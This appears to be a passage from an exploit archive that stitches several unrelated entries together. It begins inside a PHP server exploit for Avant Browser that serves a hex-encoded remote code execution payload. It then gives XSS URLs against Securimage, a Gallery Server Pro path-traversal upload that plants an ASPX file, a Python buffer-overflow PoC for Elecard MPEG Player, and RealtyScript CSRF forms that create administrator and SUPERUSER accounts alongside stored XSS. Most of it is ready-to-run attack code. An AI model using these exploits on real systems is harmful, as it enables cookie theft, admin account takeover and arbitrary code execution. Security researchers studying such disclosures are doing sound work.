0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6E\x39\x78\x3D\x31\x0D\x0A\x20\x20\x20\x20\x45\x6E\x64\x20\x49\x66\x20\x20\x0D\x0A\x20\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x72\x75\x6D\x28\x61\x64\x64\x29\x20\x0D\x0A\x20\x20\x20\x20\x4F\x6E\x20\x45\x72\x72\x6F\x72\x20\x52\x65\x73\x75\x6D\x65\x20\x4E\x65\x78\x74\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x0D\x0A\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3D\x61\x64\x64\x2B\x34\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x31\x2E\x36\x39\x37\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2D\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x72\x75\x6D\x3D\x6C\x65\x6E\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0D\x0A\x20\x20\x20\x20\x0D\x0A\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3D\x30\x0D\x0A\x20\x20\x20\x20\x72\x65\x64\x69\x6D\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0D\x0A\x65\x6E\x64\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x0D\x0A\x20\x0D\x0A\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E\x0D\x0A\x20\x3C\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x41\x76\x61\x6E\x74\x20\x42\x72\x6F\x77\x73\x65\x72\x20\x52\x65\x6D\x6F\x74\x65\x20\x43\x6F\x64\x65\x20\x45\x78\x65\x63\x75\x74\x69\x6F\x6E\x20\x44\x65\x6D\x6F\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x0D\x0A\x20\x3C\x69\x3E\x45\x68\x73\x61\x6E\x20\x4E\x6F\x72\x65\x64\x64\x69\x6E\x69\x20\x2D\x20\x40\x70\x72\x6F\x74\x33\x63\x74\x30\x72\x3C\x69\x3E\x0D\x0A\x20\x3C\x62\x72\x20\x2F\x3E\x3C\x69\x3E\x65\x68\x73\x61\x6E\x6E\x2E\x69\x6E\x66\x6F\x3C\x2F\x69\x3E\x0D\x0A\x20\x3C\x2F\x63\x65\x6E\x74\x65\x72\x3E\x0D\x0A\x3C\x2F\x62\x6F\x64\x79\x3E\x0D\x0A\x3C\x2F\x68\x74\x6D\x6C\x3E";
$msgd=str_replace("DOWNLOAD",$link,$msgd);
for (;;) {
if ($client = @socket_accept($socket)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
print "\n Target Checked Your Link \n";
}
else usleep(100000);
}
?>
source: https://www.securityfocus.com/bid/59816/info
The Securimage-WP plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Securimage-WP 3.2.4 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress/wp-content/plugins/securimage-wp/siwp_test.php/"/><script>alert(document.cookie);</script>?tested=1
source: https://www.securityfocus.com/bid/59831/info
Gallery Server Pro is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
Gallery Server Pro 2.6.1 and prior are vulnerable.
*********************************************************************
POST /gallery/gs/handler/upload.ashx?aid=2 HTTP/1.1
Host: <vulnerablesite>
Referer:
http://www.example.com/gallery/default.aspx?g=task_addobjects&aid=2
Content-Length: 73459
Content-Type: multipart/form-data;
boundary=---------------------------41184676334
Cookie: <VALID COOKIE DATA>
Pragma: no-cache
Cache-Control: no-cache
-----------------------------41184676334
Content-Disposition: form-data; name="name"
..\..\gs\mediaobjects\Samples\malicious.aspx
-----------------------------41184676334
Content-Disposition: form-data; name="file"; filename="malicious.jpg"
Content-Type: application/octet-stream
Malicious code here.
-----------------------------41184676334--
*********************************************************************
The uploaded file will then be available on the affected server at:
http://www.example.com/gallery/gs/mediaobjects/Samples/malicious.aspx
source: https://www.securityfocus.com/bid/59796/info
Securimage is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Securimage 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/securimage/example_form.php/"/><script>alert(document.cookie)</script>
source: https://www.securityfocus.com/bid/59534/info
Elecard MPEG Player is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Elecard MPEG Player 5.8 is vulnerable; other versions may also be affected.
#!/usr/bin/python
# Exploit Title:Elecard MPEG Player 5.8 Local PoC
# Download link :www.elecard.com/assets/files/distribs/mpeg-player/EMpgPlayer.zip
# Product: Vulnerable
# Elecard MPEG Player,Elecard AVC HD Player
# RST
# Date (found): 27.04.2013
# Date (publish): 27.04.2013
# Author: metacom
# version:5.8.121004
# Category: poc
# Tested on: windows 7 German
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
filename= "elecard.m3u"
buffer= "\x41" * 783
buffer+="\x42" * 4
buffer+="\x43" * 4
buffer+="\x44" * 25000
textfile = open(filename , 'w')
textfile.write(head+buffer)
textfile.close()
RealtyScript v4.0.2 Multiple CSRF And Persistent XSS Vulnerabilities
Vendor: Next Click Ventures
Product web page: http://www.realtyscript.com
Affected version: 4.0.2
Summary: RealtyScript is award-winning real estate software that makes
it effortless for a real estate agent, office, or entrepreneur to be
up and running with a real estate web site in minutes. The software
is in daily use on thousands of domain names in over 40 countries and
has been translated into over 25 languages.
Desc: The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site. Multiple
cross-site scripting vulnerabilities were also discovered. The issue
is triggered when input passed via the multiple parameters is not
properly sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.
Tested on: Apache/2.4.6 (CentOS)
PHP/5.4.16
MariaDB-5.5.41
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5269
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5269.php
01.10.2015
---
Dork: "Powered by RealtyScript v4.0.2"
--------------------
Upload Stored XSS:
POST parameter: file
--------------------
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/admin/tools.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuKWlJIoMCsN4MJyN");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuKWlJIoMCsN4MJyN\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"xss_csv.csv\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\"\x3e\x3cscript\x3ealert(\"ZSL\")\x3c/script\x3e\r\n" +
"------WebKitFormBoundaryuKWlJIoMCsN4MJyN--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit XSS #1" onclick="submitRequest();" />
</form>
</body>
</html>
--------------
CSRF Add User:
--------------
<html>
<body>
<form action="http://TARGET/admin/addusers.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="package" value="3" />
<input type="hidden" name="realtor_first_name" value="Tester" />
<input type="hidden" name="realtor_last_name" value="Testowsky" />
<input type="hidden" name="realtor_company_name" value="Zero Science Lab" />
<input type="hidden" name="realtor_description" value="1" />
<input type="hidden" name="location1" value=" " />
<input type="hidden" name="realtor_address" value="1" />
<input type="hidden" name="realtor_zip_code" value="2" />
<input type="hidden" name="realtor_phone" value="3" />
<input type="hidden" name="realtor_fax" value="4" />
<input type="hidden" name="realtor_mobile" value="5" />
<input type="hidden" name="realtor_e_mail" value="lab@zeroscience.mk" />
<input type="hidden" name="realtor_website" value=" " />
<input type="hidden" name="realtor_login" value="Adminized" />
<input type="hidden" name="realtor_password" value="123456" />
<input type="hidden" name="realtor_password_2" value="123456" />
<input type="hidden" name="submit_realtor" value="Register" />
<input type="submit" value="Forge User" />
</form>
</body>
</html>
------------------------------
CSRF Add SUPERUSER:
Level SUPERUSER for SUPERUSER
Level Global for Administrator
------------------------------
<html>
<body>
<form action="http://TARGET/admin/editadmins.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="login" value="joxypoxy" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="level" value="SUPERUSER" />
<input type="hidden" name="submit_admin" value="Add" />
<input type="submit" value="Forge SUPERUSER" />
</form>
</body>
</html>
-----------------------------
Stored XSS:
POST parameter: location_name
-----------------------------
<html>
<body>
<form action="http://TARGET/admin/locations.php?action=add" method="POST">
<input type="hidden" name="location_name" value='"><script>confirm(2)</script>' />
<input type="hidden" name="location_parent" value="0" />
<input type="hidden" name="submit" value="submit" />
<input type="submit" value="Submit XSS #2" />
</form>
</body>
</html>
----------------------------
IFRAME Injection Stored XSS:
POST parameter: text
----------------------------
<html>
<body>
<form action="http://TARGET/admin/pages.php?action=add" method="POST">
<input type="hidden" name="menu" value="TESTINGUSIFRAME" />
<input type="hidden" name="menu2" value="" />
<input type="hidden" name="menu3" value="" />
<input type="hidden" name="menu4" value="" />
<input type="hidden" name="menu5" value="" />
<input type="hidden" name="menu6" value="" />
<input type="hidden" name="menu7" value="" />
<input type="hidden" name="menu8" value="" />
<input type="hidden" name="menu9" value="" />
<input type="hidden" name="menu10" value="" />
<input type="hidden" name="menu11" value="" />
<input type="hidden" name="menu12" value="" />
<input type="hidden" name="menu13" value="" />
<input type="hidden" name="string" value="iframe101" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="navigation" value="1" />
<input type="hidden" name="text" value='Waddudp <br /><iframe frameborder="0" height="200" name="AAA" scrolling="no" src="http://zeroscience.mk/en" title="BBB" width="200"></iframe><br />' />
<input type="hidden" name="text2" value="" />
<input type="hidden" name="text3" value="" />
<input type="hidden" name="text4" value="" />
<input type="hidden" name="text5" value="" />
<input type="hidden" name="text6" value="" />
<input type="hidden" name="text7" value="" />
<input type="hidden" name="text8" value="" />
<input type="hidden" name="text9" value="" />
<input type="hidden" name="text10" value="" />
<input type="hidden" name="text11" value="" />
<input type="hidden" name="text12" value="" />
<input type="hidden" name="text13" value="" />
<input type="hidden" name="submit" value="Add Page" />
<input type="submit" value="Submit XSS #3" />
</form>
</body>
</html>